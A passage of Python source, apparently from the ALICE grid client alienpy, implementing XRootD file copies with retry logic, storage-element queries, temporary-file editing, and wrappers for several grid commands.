copy_failed_list = XrdCopy(wb, xrdcopy_job_list, my_cp_args, printout) if not _use_system_xrdcp else XrdCopy_xrdcp(wb, xrdcopy_job_list, my_cp_args, printout)
copy_jobs_nr = len(xrdcopy_job_list)
copy_jobs_failed_nr = len(copy_failed_list)
copy_jobs_success_nr = copy_jobs_nr - copy_jobs_failed_nr
msg1 = f"Succesful jobs (1st try): {copy_jobs_success_nr}/{copy_jobs_nr}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_failed_list2 = []
if copy_failed_list:
to_recover_list_try1 = []
failed_lfns = set([copy_job.lfn for copy_job in copy_failed_list if copy_job.isUpload]) # get which lfns had problems only for uploads
for lfn in failed_lfns: # process failed transfers per lfn
failed_lfn_copy_jobs = [x for x in copy_failed_list if x.lfn == lfn] # gather all failed copy jobs for one lfn
failed_replica_nr = len(failed_lfn_copy_jobs)
excluded_SEs_list = []
for job in failed_lfn_copy_jobs:
for se in job.token_request["SElist"]:
excluded_SEs_list.append(f'!{se}')
excluded_SEs = ','.join(set(excluded_SEs_list)) # exclude already used SEs
specs_list = f'disk:{failed_replica_nr},{excluded_SEs}' # request N replicas (in place of failed ones), and exclude anything used
job_file = failed_lfn_copy_jobs[0].token_request['file']
job_lfn = failed_lfn_copy_jobs[0].token_request['lfn']
job_isWrite = failed_lfn_copy_jobs[0].isUpload
tokens_retry1 = lfn2fileTokens(wb, lfn2file(job_lfn, job_file), specs_list, job_isWrite, strictspec, httpurl)
if not tokens_retry1 or 'answer' not in tokens_retry1: continue
to_recover_list_try1.append(CopyFile(job_file, job_lfn, job_isWrite, tokens_retry1['answer'], job_lfn))
if to_recover_list_try1:
xrdcopy_job_list_2 = []
makelist_xrdjobs(to_recover_list_try1, xrdcopy_job_list_2)
copy_failed_list2 = XrdCopy(wb, xrdcopy_job_list_2, my_cp_args, printout)
copy_jobs_nr1 = len(xrdcopy_job_list_2)
copy_jobs_failed_nr1 = len(copy_failed_list2)
copy_jobs_success_nr1 = copy_jobs_nr1 - copy_jobs_failed_nr1
msg2 = f"Succesful jobs (2nd try): {copy_jobs_success_nr1}/{copy_jobs_nr1}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_failed_list3 = []
if copy_failed_list2:
to_recover_list_try2 = []
failed_lfns2 = set([copy_job.lfn for copy_job in copy_failed_list2 if copy_job.isUpload]) # get which lfns had problems only for uploads
for lfn in failed_lfns2: # process failed transfers per lfn
failed_lfn_copy_jobs2 = [x for x in copy_failed_list2 if x.lfn == lfn] # gather all failed copy jobs for one lfn
failed_replica_nr = len(failed_lfn_copy_jobs2)
excluded_SEs_list = []
for job in failed_lfn_copy_jobs2:
for se in job.token_request["SElist"]:
excluded_SEs_list.append(f'!{se}')
excluded_SEs = ','.join(set(excluded_SEs_list)) # exclude already used SEs
specs_list = f'disk:{failed_replica_nr},{excluded_SEs}' # request N replicas (in place of failed ones), and exclude anything used
job_file = failed_lfn_copy_jobs2[0].token_request['file']
job_lfn = failed_lfn_copy_jobs2[0].token_request['lfn']
job_isWrite = failed_lfn_copy_jobs2[0].isUpload
tokens_retry2 = lfn2fileTokens(wb, lfn2file(job_lfn, job_file), specs_list, job_isWrite, strictspec, httpurl)
if not tokens_retry2 or 'answer' not in tokens_retry2: continue
to_recover_list_try2.append(CopyFile(job_file, job_lfn, job_isWrite, tokens_retry2['answer'], job_lfn))
if to_recover_list_try2:
xrdcopy_job_list_3 = []
makelist_xrdjobs(to_recover_list_try2, xrdcopy_job_list_3)
copy_failed_list3 = XrdCopy(wb, xrdcopy_job_list_3, my_cp_args, printout)
copy_jobs_nr2 = len(xrdcopy_job_list_3)
copy_jobs_failed_nr2 = len(copy_failed_list3)
copy_jobs_success_nr2 = copy_jobs_nr2 - copy_jobs_failed_nr2
msg3 = f"Succesful jobs (3rd try): {copy_jobs_success_nr2}/{copy_jobs_nr2}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_jobs_failed_total = copy_jobs_failed_nr + copy_jobs_failed_nr1 + copy_jobs_failed_nr2
copy_jobs_nr_total = copy_jobs_nr + copy_jobs_nr1 + copy_jobs_nr2
copy_jobs_success_nr_total = copy_jobs_success_nr + copy_jobs_success_nr1 + copy_jobs_success_nr2
# hard to return a single exitcode for a copy process optionally spanning multiple files
# we'll return SUCCESS if at least one lfn is confirmed, FAIL if no lfn is confirmed
msg_list = [msg1, msg2, msg3]
if msg2 or msg3:
msg_sum = f"Succesful jobs (total): {copy_jobs_success_nr_total}/{copy_jobs_nr}" if not ('quiet' in printout or 'silent' in printout) else ''
msg_list.append(msg_sum)
msg_all = '\n'.join(x.strip() for x in msg_list if x.strip())
if 'ALIENPY_NOXRDZIP' in os.environ: os.environ.pop("ALIENPY_NOXRDZIP")
return RET(0, msg_all) if copy_jobs_success_nr_total > 0 else RET(1, '', msg_all)
if _HAS_XROOTD:
class MyCopyProgressHandler(xrd_client.utils.CopyProgressHandler):
"""Custom ProgressHandler for XRootD copy process"""
__slots__ = ('wb', 'copy_failed_list', 'jobs', 'job_list', 'xrdjob_list', 'succesful_writes', 'printout', 'debug')
def __init__(self):
self.wb = None
self.copy_failed_list = [] # record the failed jobs
self.jobs = int(0)
self.job_list = []
self.xrdjob_list = []
self.succesful_writes = []
self.printout = ''
self.debug = False
def begin(self, jobId, total, source, target):
timestamp_begin = datetime.datetime.now().timestamp()
if not ('quiet' in self.printout or 'silent' in self.printout):
print_out("jobID: {0}/{1} >>> Start".format(jobId, total))
self.jobs = int(total)
jobInfo = {'src': source, 'tgt': target, 'bytes_total': 0, 'bytes_processed': 0, 'start': timestamp_begin}
self.job_list.insert(jobId - 1, jobInfo)
if self.debug: logging.debug(f"CopyProgressHandler.src: {source}\nCopyProgressHandler.dst: {target}\n")
def end(self, jobId, results):
if results['status'].ok:
status = f'{PrintColor(COLORS.Green)}OK{PrintColor(COLORS.ColorReset)}'
elif results['status'].error:
status = f'{PrintColor(COLORS.BRed)}ERROR{PrintColor(COLORS.ColorReset)}'
elif results['status'].fatal:
status = f'{PrintColor(COLORS.BIRed)}FATAL{PrintColor(COLORS.ColorReset)}'
else:
status = f'{PrintColor(COLORS.BIRed)}UNKNOWN{PrintColor(COLORS.ColorReset)}'
job_info = self.job_list[jobId - 1]
xrdjob = self.xrdjob_list[jobId - 1] # job list initialized when starting; we use the internal index to locate the job
replica_dict = xrdjob.token_request
job_status_info = f"jobID: {jobId}/{self.jobs} >>> STATUS {status}"
deltaT = datetime.datetime.now().timestamp() - float(job_info['start'])
if os.getenv('XRD_LOGLEVEL'): logging.debug(f'XRD copy job time:: {xrdjob.lfn} -> {deltaT}')
if results['status'].ok:
speed = float(job_info['bytes_total'])/deltaT
speed_str = f'{GetHumanReadable(speed)}/s'
if xrdjob.isUpload: # isUpload
perm = '644'
expire = '0'
self.succesful_writes.append(CommitInfo(replica_dict['envelope'], replica_dict['size'], xrdjob.lfn, perm, expire, replica_dict['url'], replica_dict['se'], replica_dict['guid'], replica_dict['md5']))
else: # isDownload
if 'ALIENPY_NOXRDZIP' in os.environ: # NOXRDZIP was requested
if os.path.isfile(xrdjob.dst) and zipfile.is_zipfile(xrdjob.dst):
src_file_name = os.path.basename(xrdjob.lfn)
dst_file_name = os.path.basename(xrdjob.dst)
dst_file_path = os.path.dirname(xrdjob.dst)
zip_name = f'{xrdjob.dst}_{uuid.uuid4()}.zip'
os.replace(xrdjob.dst, zip_name)
with zipfile.ZipFile(zip_name) as myzip:
if src_file_name in myzip.namelist():
out_path = myzip.extract(src_file_name, path = dst_file_path)
if out_path and (src_file_name != dst_file_name): os.replace(out_path, os.path.join(dst_file_path, dst_file_name)) # rename the extracted member to the requested name
else: # the downloaded file is actually a zip file
os.replace(zip_name, xrdjob.dst)
if os.path.isfile(zip_name): os.remove(zip_name)
if not ('quiet' in self.printout or 'silent' in self.printout):
print_out(f"{job_status_info} >>> SPEED {speed_str}")
else:
self.copy_failed_list.append(xrdjob)
if xrdjob.isUpload:
msg = f"{job_status_info} : {xrdjob.token_request['file']} to {xrdjob.token_request['se']}, {xrdjob.token_request['nSEs']} replicas"
else:
msg = f"{job_status_info} : {xrdjob.lfn}"
codes_info = f">>> ERRNO/CODE/XRDSTAT {results['status'].errno}/{results['status'].code}/{results['status'].status}"
xrd_resp_msg = results['status'].message
logging.error(f"\n{codes_info}\n{xrd_resp_msg}\n{msg}")
print_err(msg)
if not xrdjob.isUpload:
meta_path, sep, url_opts = str(xrdjob.src).partition("?")
if os.getenv('ALIENPY_KEEP_META'):
subprocess.run(shlex.split(f'mv {meta_path} {os.getcwd()}/'))
else:
os.remove(meta_path) # remove the created metalink
def update(self, jobId, processed, total):
self.job_list[jobId - 1]['bytes_processed'] = processed
self.job_list[jobId - 1]['bytes_total'] = total
def should_cancel(self, jobId):
return False
def XrdCopy(wb, job_list: list, xrd_cp_args: XrdCpArgs, printout: str = '') -> list:
"""XRootD copy command :: the actual XRootD copy process"""
if not _HAS_XROOTD:
print_err("XRootD not found or lower than 5.3.3")
return []
if not xrd_cp_args:
print_err("cp arguments are not set, XrdCpArgs tuple missing")
return []
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
sources = xrd_cp_args.sources
chunks = xrd_cp_args.chunks
chunksize = xrd_cp_args.chunksize
makedir = xrd_cp_args.makedir
tpc = xrd_cp_args.tpc
posc = xrd_cp_args.posc
# hashtype = xrd_cp_args.hashtype
streams = xrd_cp_args.streams
cksum = xrd_cp_args.cksum
timeout = xrd_cp_args.timeout
rate = xrd_cp_args.rate
if streams > 0:
if streams > 15: streams = 15
xrd_client.EnvPutInt('SubStreamsPerChannel', streams)
cksum_mode = 'none' # none | source | target | end2end
cksum_type = ''
cksum_preset = ''
delete_invalid_chk = False
if cksum: # checksumming defaults good enough also for uploads
xrd_client.EnvPutInt('ZipMtlnCksum', 1)
cksum_mode = 'end2end'
cksum_type = 'auto'
delete_invalid_chk = True
handler = MyCopyProgressHandler()
handler.wb = wb
handler.xrdjob_list = job_list
handler.printout = printout
handler.succesful_writes = []
if _DEBUG: handler.debug = True
process = xrd_client.CopyProcess()
process.parallel(int(batch))
for copy_job in job_list:
if _DEBUG: logging.debug("\nadd copy job with\nsrc: {0}\ndst: {1}\n".format(copy_job.src, copy_job.dst))
if cksum:
if copy_job.isUpload:
# WIP: checksumming with md5 for uploading breaks, keep it on auto
# cksum_type = 'md5'
# cksum_preset = copy_job.token_request['md5']
pass
else: # for downloads we already have the md5 value, lets use that
cksum_type, cksum_preset = get_hash_meta(copy_job.src)
if not cksum_type or not cksum_preset:
cksum_type = ''
cksum_preset = ''
cksum_mode = 'none'
process.add_job(copy_job.src, copy_job.dst, sourcelimit = sources,
force = overwrite, posc = posc, mkdir = makedir,
chunksize = chunksize, parallelchunks = chunks, thirdparty = tpc,
checksummode = cksum_mode, checksumtype = cksum_type, checksumpreset = cksum_preset, rmBadCksum = delete_invalid_chk)
process.prepare()
process.run(handler)
if handler.succesful_writes: # if there were succesful uploads/remote writes, let's commit them to file catalogue
ret_list = commitFileList(wb, handler.succesful_writes)
for ret in ret_list: retf_print(ret, 'noout err')
return handler.copy_failed_list # lets see what failed and try to recover
def xrd_stat(pfn: str):
if not _HAS_XROOTD:
print_err('python XRootD module not found')
return None
url_components = urlparse(pfn)
endpoint = xrd_client.FileSystem(url_components.netloc)
answer = endpoint.stat(url_components.path)
return answer
def get_pfn_flags(pfn: str):
answer = xrd_stat(pfn)
if answer is None or not answer[0].ok: return None # xrd_stat returns None when the XRootD module is missing
return answer[1].flags
def is_pfn_readable(pfn: str) -> bool:
flags = get_pfn_flags(pfn)
if flags is None: return False
return bool(flags & xrd_client.flags.StatInfoFlags.IS_READABLE)
def DO_pfnstatus(args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
if not args or is_help(args):
msg = ('Command format: pfn_status <pfn>\n'
'It will return all flags reported by the xrootd server - this is direct access to the server')
return RET(0, msg)
pfn = args.pop(0)
answer = xrd_stat(pfn)
if answer is None: return RET(1, '', 'pfn_status:: python XRootD module not found')
response_stat = answer[0]
response_statinfo = answer[1]
if not response_stat.ok:
msg = (f'{response_stat.message}; code/status: {response_stat.code}/{response_stat.status}')
return RET(response_stat.shellcode, '', msg)
size = response_statinfo.size
modtime = response_statinfo.modtimestr
flags = response_statinfo.flags
x_bit_set = 1 if flags & xrd_client.flags.StatInfoFlags.X_BIT_SET else 0
is_dir = 1 if flags & xrd_client.flags.StatInfoFlags.IS_DIR else 0
other = 1 if flags & xrd_client.flags.StatInfoFlags.OTHER else 0
offline = 1 if flags & xrd_client.flags.StatInfoFlags.OFFLINE else 0
posc_pending = 1 if flags & xrd_client.flags.StatInfoFlags.POSC_PENDING else 0
is_readable = 1 if flags & xrd_client.flags.StatInfoFlags.IS_READABLE else 0
is_writable = 1 if flags & xrd_client.flags.StatInfoFlags.IS_WRITABLE else 0
msg = (f'''Size: {size}\n'''
f'''Modification time: {modtime}\n'''
f'''Executable bit: {x_bit_set}\n'''
f'''Is directory: {is_dir}\n'''
f'''Not a file or directory: {other}\n'''
f'''File is offline (not on disk): {offline}\n'''
f'''File opened with POSC flag, not yet successfully closed: {posc_pending}\n'''
f'''Is readable: {is_readable}\n'''
f'''Is writable: {is_writable}''')
return RET(response_stat.shellcode, msg)
def get_pfn_list(wb, lfn: str) -> list:
if not wb: return []
if not lfn: return []
if pathtype_grid(wb, lfn) != 'f': return []
ret_obj = SendMsg(wb, 'whereis', [lfn], opts = 'nomsg')
retf_print(ret_obj, 'debug')
return [str(item['pfn']) for item in ret_obj.ansdict['results']]
def DO_getSE(wb, args: list = None) -> RET:
if not wb: return RET(1, '', 'DO_getSE:: no websocket connection')
if not args: args = []
if is_help(args):
msg = 'Command format: getSE <-id | -name | -srv> identifier_string\nReturn the specified property for the SE specified label'
return RET(0, msg)
ret_obj = SendMsg(wb, 'listSEs', [], 'nomsg')
if ret_obj.exitcode != 0: return ret_obj
arg_select = None
if get_arg(args, '-id'): arg_select = 'id'
if get_arg(args, '-name'): arg_select = 'name'
if get_arg(args, '-srv'): arg_select = 'srv'
if arg_select is None: arg_select = 'name'
if not args:
se_list = [f"{se['seNumber']}\t{se['seName']}\t{se['endpointUrl'].replace('root://','')}" for se in ret_obj.ansdict["results"]]
return RET(0, '\n'.join(se_list))
def match_name(se: Union[dict, None] = None, name: str = '') -> bool:
if se is None or not name: return False
if name.isdecimal(): return name in se['seNumber']
return name.casefold() in se['seName'].casefold() or name.casefold() in se['seNumber'].casefold() or name.casefold() in se['endpointUrl'].casefold()
se_name = args[-1].casefold()
se_list = []
rez_list = []
for se in ret_obj.ansdict["results"]:
if match_name(se, se_name): se_list.append(se)
if not se_list: return RET(1, '', f">{args[-1]}< label(s) not found in SE list")
for se_info in se_list:
srv_name = urlparse(se_info["endpointUrl"]).netloc.strip()
if se_name.isdecimal():
if arg_select == 'name':
rez_list.append(se_info['seName'])
elif arg_select == 'srv':
rez_list.append(srv_name)
else:
rez_list.append(f"{se_info['seName']} {srv_name}")
else:
if arg_select == 'name':
rez_list.append(se_info['seName'])
elif arg_select == 'srv':
rez_list.append(srv_name)
elif arg_select == 'id':
rez_list.append(se_info['seNumber'])
else:
rez_list.append(f"{se_info['seNumber']}\t{se_info['seName']}\t\t{srv_name}")
if not rez_list: return RET(1, '', f"Empty result when searching for: {args[-1]}")
return RET(0, '\n'.join(rez_list))
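# Example invocations (SE labels are illustrative):
#   getSE -srv ALICE::CERN::EOS  -> endpoint host(s) of the matching SE(s)
#   getSE -id EOS                -> SE number(s) of every SE whose name/number/URL contains 'EOS'
#   getSE 123                    -> SE name for SE number 123 (the default selector is -name)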
def get_qos(wb, se_str: str) -> str:
"""Get qos tags for a given SE"""
if not wb: return ''
if '::' not in se_str: return '' # the se name should have :: in it
ret_obj = SendMsg(wb, 'listSEs', [], 'nomsg')
for se in ret_obj.ansdict["results"]:
if se["seName"].lower().replace('alice::', '') == se_str.lower().replace('alice::', ''):
return se["qos"]
return ''
def DO_SEqos(wb, args: list = None) -> RET:
if not wb: return RET(1, '', 'DO_SEqos:: no websocket connection')
if not args or is_help(args):
msg = 'Command format: SEqos <SE name>\nReturn the QOS tags for the specified SE (ALICE:: can be omitted and capitalization does not matter)'
return RET(0, msg)
return RET(0, get_qos(wb, args[0]))
def get_lfn_meta(meta_fn: str) -> str:
if not os.path.isfile(meta_fn): return ''
return xml.dom.minidom.parse(meta_fn).documentElement.getElementsByTagName('lfn')[0].firstChild.nodeValue
def get_hash_meta(meta_fn: str) -> tuple:
if 'meta4?' in meta_fn: meta_fn = meta_fn.partition('?')[0]
if not os.path.isfile(meta_fn): return ('','')
content = xml.dom.minidom.parse(meta_fn).documentElement.getElementsByTagName('hash')[0]
return (content.getAttribute('type'), content.firstChild.nodeValue)
def lfn2tmp_fn(lfn: str = '', uuid5: bool = False) -> str:
"""make temporary file name that can be reconstructed back to the lfn"""
if not lfn: return str(uuid.uuid4())
if uuid5:
return str(uuid.uuid5(uuid.NAMESPACE_URL, lfn))
return lfn.replace("/", '%%')
def make_tmp_fn(lfn: str = '', ext: str = '', uuid5: bool = False) -> str:
"""make temporary file path string either random or based on grid lfn string"""
if not ext: ext = f'_{str(os.getuid())}.alienpy_tmp'
return f'{_TMPDIR}/{lfn2tmp_fn(lfn, uuid5)}{ext}'
def get_lfn_name(tmp_name: str = '', ext: str = '') -> str:
lfn = tmp_name.replace(ext, '') if ext else tmp_name.replace(f'_{str(os.getuid())}.alienpy_tmp', '')
return lfn.replace(f'{_TMPDIR}/', '').replace("%%", "/")
def download_tmp(wb, lfn: str, overwrite: bool = False) -> str:
"""Download a lfn to a temporary file, it will return the file path of temporary"""
global AlienSessionInfo
tmpfile = make_tmp_fn(expand_path_grid(wb, lfn))
if os.path.isfile(tmpfile):
if overwrite:
os.remove(tmpfile)
if tmpfile in AlienSessionInfo['templist']: AlienSessionInfo['templist'].remove(tmpfile)
else:
if tmpfile not in AlienSessionInfo['templist']: AlienSessionInfo['templist'].append(tmpfile)
return tmpfile
if tmpfile in AlienSessionInfo['templist']: AlienSessionInfo['templist'].remove(tmpfile) # just in case it is still in list
copycmd = f"-f {lfn} file:{tmpfile}"
ret_obj = DO_XrootdCp(wb, copycmd.split(), printout = 'silent') # print only errors for temporary downloads
if ret_obj.exitcode == 0 and os.path.isfile(tmpfile):
AlienSessionInfo['templist'].append(tmpfile)
return tmpfile
return ''
def upload_tmp(wb, temp_file_name: str, upload_specs: str = '', dated_backup: bool = False) -> str:
"""Upload a temporary file: the original lfn will be renamed and the new file will be uploaded with the original lfn"""
lfn = get_lfn_name(temp_file_name) # lets recover the lfn from temp file name
lfn_backup = f'{lfn}.{now_str()}' if dated_backup else f'{lfn}~'
if not dated_backup:
ret_obj = SendMsg(wb, 'rm', ['-f', lfn_backup]) # remove already present old backup; useless to pre-check
ret_obj = SendMsg(wb, 'mv', [lfn, lfn_backup]) # let's create a backup of old lfn
if retf_print(ret_obj, 'debug') != 0: return ''
tokens = lfn2fileTokens(wb, lfn2file(lfn, temp_file_name), [upload_specs], isWrite = True)
access_request = tokens['answer']
replicas = access_request["results"][0]["nSEs"]
if "disk:" not in upload_specs: upload_specs = f'disk:{replicas}'
if upload_specs: upload_specs = f'@{upload_specs}'
copycmd = f'-f file:{temp_file_name} {lfn}{upload_specs}'
ret_obj = DO_XrootdCp(wb, copycmd.split())
if ret_obj.exitcode == 0: return lfn
ret_obj = SendMsg(wb, 'mv', [lfn_backup, lfn]) # if the upload failed, let's move the backup back to the original lfn name
retf_print(ret_obj, 'debug')
return ''
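# download_tmp/upload_tmp form the edit cycle used by DO_edit below: download the lfn to a
# temporary file, modify it locally, then upload_tmp moves the original lfn to a backup
# (lfn~ or lfn.<date>) and uploads the new content under the original name.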
def queryML(args: list = None) -> str:
"""submit: process submit commands for local jdl cases"""
global AlienSessionInfo
alimon = 'http://alimonitor.cern.ch/rest/'
type_json = '?Accept=application/json'
type_xml = '?Accept=text/xml'
type_plain = '?Accept=text/plain'
type_default = ''
predicate = ''
if 'text' in args:
type_default = type_plain
args.remove('text')
if 'xml' in args:
type_default = type_xml
args.remove('xml')
if 'json' in args:
type_default = type_json
args.remove('json')
if args: predicate = args[0]
url = f"{alimon}{predicate}{type_default}"
req = urlreq.urlopen(url)
ansraw = req.read().decode()
if req.getcode() == 200:
AlienSessionInfo['exitcode'] = 0
else:
AlienSessionInfo['exitcode'] = req.getcode()
return ansraw
def file2xml_el(filepath: str) -> ALIEN_COLLECTION_EL:
"""Get a file and return an XML element structure"""
if not filepath or not os.path.isfile(filepath): return ALIEN_COLLECTION_EL()
p = Path(filepath).expanduser().resolve(strict = True)
p_stat = p.stat()
turl = f'file://{p.as_posix()}'
return ALIEN_COLLECTION_EL(
name = p.name, aclId = "", broken = "0", ctime = time_unix2simple(p_stat.st_ctime),
dir = '', entryId = '', expiretime = '', gowner = p.group(), guid = '', guidtime = '', jobid = '', lfn = turl,
md5 = md5(p.as_posix()), owner = p.owner(), perm = str(oct(p_stat.st_mode))[5:], replicated = "0",
size = str(p_stat.st_size), turl = turl, type = 'f')
def mk_xml_local(filepath_list: list):
xml_root = ET.Element('alien')
collection = ET.SubElement(xml_root, 'collection', attrib={'name': 'tempCollection'})
for idx, item in enumerate(filepath_list, start = 1):
e = ET.SubElement(collection, 'event', attrib={'name': str(idx)})
f = ET.SubElement(e, 'file', attrib=file2xml_el(lfn_prefix_re.sub('', item))._asdict())
oxml = ET.tostring(xml_root, encoding = 'ascii')
dom = xml.dom.minidom.parseString(oxml)
return dom.toprettyxml()
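# Shape of the XML produced by mk_xml_local (illustrative, attribute subset shown):
#   <alien>
#     <collection name="tempCollection">
#       <event name="1">
#         <file name="f.root" turl="file:///abs/path/f.root" type="f" size="..." md5="..."/>
#       </event>
#     </collection>
#   </alien>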
def DO_2xml(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if not args or is_help(args):
central_help = SendMsg(wb, 'toXml', ['-h'], opts = 'nokeys')
central_help_msg = central_help.out
msg_local = ('\nAdditionally the client implements these options:'
'\n-local: specify that the target lfns are local files'
'\nfor -x (output file) and -l (file with lfns) the file: and alien: prefixes indicate the location of the file'
'\nthe inferred default is that the target files and the output file are of the same type'
)
msg = f'{central_help_msg}{msg_local}'
return RET(0, msg)
is_local = get_arg(args, '-local')
ignore_missing = get_arg(args, '-i')
do_append = get_arg(args, '-a')
output_file = get_arg_value(args, '-x')
if do_append and output_file is None: return RET(1, '', 'Append operation needs the -x argument to specify the target file')
lfn_filelist = get_arg_value(args, '-l')
lfn_list = []
find_arg_list = None
lfn_arg_list = None
if lfn_filelist: # a given file with list of files/lfns was provided
if is_local:
if not os.path.exists(lfn_filelist): return RET(1, '', f'filelist {lfn_filelist} could not be found!!')
filelist_content_list = file2list(lfn_filelist)
if not filelist_content_list: return RET(1, '', f'No files could be read from {lfn_filelist}')
if filelist_content_list[0].startswith('alien:'):
return RET(1, '', 'Local filelists should contain only local files (not alien: lfns)')
xml_coll = mk_xml_local(filelist_content_list)
if output_file:
if output_file.startswith('alien:'):
return RET(1, '', 'For the moment upload the resulting file by hand in grid')
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(xml_coll)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
else:
return RET(0, xml_coll)
else:
grid_args = []
if ignore_missing: grid_args.append('-i')
if do_append: grid_args.append('-a')
if lfn_filelist: grid_args.extend(['-l', lfn_filelist])
if output_file and not output_file.startswith("file:"): grid_args.extend(['-x', lfn_prefix_re.sub('', output_file)])
ret_obj = SendMsg(wb, 'toXml', grid_args)
if output_file and output_file.startswith("file:"):
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(ret_obj.out)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
return ret_obj
return RET(1, '', 'Allegedly unreachable point in DO_2xml. If you see this, contact the developer!')
else:
lfn_arg_list = args.copy() # the rest of arguments are lfns
if is_local:
lfn_list_obj_list = [file2file_dict(filepath) for filepath in lfn_arg_list]
if not lfn_list_obj_list: return RET(1, '', f'Invalid list of files: {lfn_arg_list}')
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in lfn_list_obj_list]
xml_coll = mk_xml_local(lfn_list)
if output_file:
if output_file.startswith('alien:'):
return RET(1, '', 'For the moment upload the resulting file by hand in grid')
output_file = lfn_prefix_re.sub('', output_file)
with open(output_file, 'w') as f: f.write(xml_coll)
return RET(0)
else:
return RET(0, xml_coll)
else:
grid_args = []
if ignore_missing: grid_args.append('-i')
if do_append: grid_args.append('-a')
if output_file and not output_file.startswith("file:"): grid_args.extend(['-x', lfn_prefix_re.sub('', output_file)])
grid_args.extend(lfn_arg_list)
ret_obj = SendMsg(wb, 'toXml', grid_args)
if output_file and output_file.startswith("file:"):
output_file = lfn_prefix_re.sub('', output_file)
try:
with open(output_file, 'w') as f: f.write(ret_obj.out)
return RET(0)
except Exception as e:
logging.exception(e)
return RET(1, '', f'Error writing {output_file}')
return ret_obj
return RET(1, '', 'Allegedly unreachable point in DO_2xml. If you see this, contact the developer!')
def DO_queryML(args: Union[list, None] = None) -> RET:
"""submit: process submit commands for local jdl cases"""
global AlienSessionInfo
if args is None: args = []
if is_help(args):
msg_help = ('usage: queryML <ML node>\n'
'time range can be specified for a parameter:\n'
'/[starting time spec]/[ending time spec]/parameter\n'
'where the two time specs can be given in absolute epoch timestamp (in milliseconds), as positive values,\n'
'or relative timestamp to `now`, when they are negative.\nFor example `-60000` would be "1 minute ago" and effectively `-1` means "now".')
return RET(0, msg_help)
types = ('text', 'xml', 'json')
for arg in args.copy(): # remove any user-given output type, json is enforced below
if arg in types: args.remove(arg)
args.append('json')
ansraw = queryML(args)
ans2dict = json.loads(ansraw)
ans_list = ans2dict["results"]
if len(ans_list) == 0:
return RET(AlienSessionInfo['exitcode'], "", "queryML:: Empty answer")
if 'Timestamp' in ans_list[0]:
for item in ans_list: item['Timestamp'] = unixtime2local(item['Timestamp'])
# all elements will have the same key names
# n_columns = len(ans_list[0])
keys = ans_list[0].keys()
# establish keys width
max_value_size = [len(key) for key in keys]
for row in ans_list:
for idx, key in enumerate(keys):
max_value_size[idx] = max(max_value_size[idx], len(str(row.get(key))))
max_value_size[:] = [w + 3 for w in max_value_size]
# create width specification list
row_format_list = [f'{{: <{str(w)}}}' for w in max_value_size]
row_format = "".join(row_format_list)
msg = row_format.format(*keys)
for row in ans_list:
value_list = [row.get(key) for key in keys]
msg = f'{msg}\n{row_format.format(*value_list)}'
return RET(AlienSessionInfo['exitcode'], msg, "")
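# Example (the ML node path is illustrative, see queryML above for the URL construction):
#   queryML SOME/NODE/parameter            -> tabulated answer (json is enforced)
#   queryML /-60000/-1/SOME/NODE/parameter -> same parameter, restricted to the last minute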
def DO_submit(wb, args: Union[list, None] = None) -> RET:
"""submit: process submit commands for local jdl cases"""
if not args: args = ['-h']
if is_help(args): return get_help_srv(wb, 'submit')
if args[0].startswith("file:"):
msg = ("Specifications as to where to upload the jdl to be submitted and with what parameters are not yet defined\n"
"Upload first the jdl to a suitable location (with a safe number of replicas) and then submit")
return RET(0, msg)
args[0] = expand_path_grid(wb, args[0])
return SendMsg(wb, 'submit', args)
def DO_ps(wb, args: Union[list, None] = None) -> RET:
"""ps : show and process ps output"""
if args is None: args = []
ret_obj = SendMsg(wb, 'ps', args)
if '-trace' in args:
nice_lines = [convert_time(str(msgline)) for item in ret_obj.ansdict['results'] for msgline in item['message'].split('\n')]
return ret_obj._replace(out = '\n'.join(nice_lines))
return ret_obj
def DO_cat(wb, args: Union[list, None] = None) -> RET:
"""cat lfn :: apply cat on a downloaded lfn as a temporary file"""
if args is None: args = []
args.insert(0, '-noout') # do not capture output, let the application use the terminal
args.insert(0, 'cat')
return DO_run(wb, args, external = True)
def DO_less(wb, args: Union[list, None] = None) -> RET:
"""less lfn :: apply less on a downloaded lfn as a temporary file"""
if args is None: args = []
args.insert(0, '-noout') # do not capture output, let the application use the terminal
args.insert(0, 'less')
return DO_run(wb, args, external = True)
def DO_more(wb, args: Union[list, None] = None) -> RET:
"""more lfn :: apply more on a downloaded lfn as a temporary file"""
if args is None: args = []
args.insert(0, '-noout') # do not capture output, let the application use the terminal
args.insert(0, 'more')
return DO_run(wb, args, external = True)
def DO_pfn(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if is_help(args):
msg = 'Command format : pfn [lfn]\nIt will print only the list of associated pfns (simplified form of whereis)'
return RET(0, msg)
cmd = 'whereis'
args.insert(0, '-r')
ret_obj = SendMsg(wb, cmd, args, opts = 'nomsg')
msg = '\n'.join(str(item['pfn']) for item in ret_obj.ansdict['results'] if 'pfn' in item).strip()
return ret_obj._replace(out = msg)
def DO_lfn2uri(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if is_help(args):
msg = '''Command format : lfn2uri <lfn> <local_file?> [meta] [write|upload] [strict] [http]
It will print the URIs for lfn replicas
local_file : required only for write|upload URIs
meta : will write in current directory the metafile and will return the string to be used with xrdcp
write|upload : request tokens for writing/upload; incompatible with <meta> argument
strict : lfn specifications will be considered to be strict
http : URIs will be for http end-points of enabled SEs
'''
return RET(0, msg)
write_meta = get_arg(args, 'meta')
strictspec = get_arg(args, 'strict')
httpurl = get_arg(args, 'http')
isWrite = get_arg(args, 'upload')
if not isWrite: isWrite = get_arg(args, 'write')
if isWrite and write_meta:
return RET(1, '', 'meta argument is incompatible with uploading')
if isWrite and len(args) < 2: return RET(1, '', 'for upload URIs two elements are required: lfn local_file')
if len(args) < 1: return RET(1, '', 'at least one argument is needed: lfn')
local_file = ''
if len(args) > 1: local_file = args[1]
lfn = args[0]
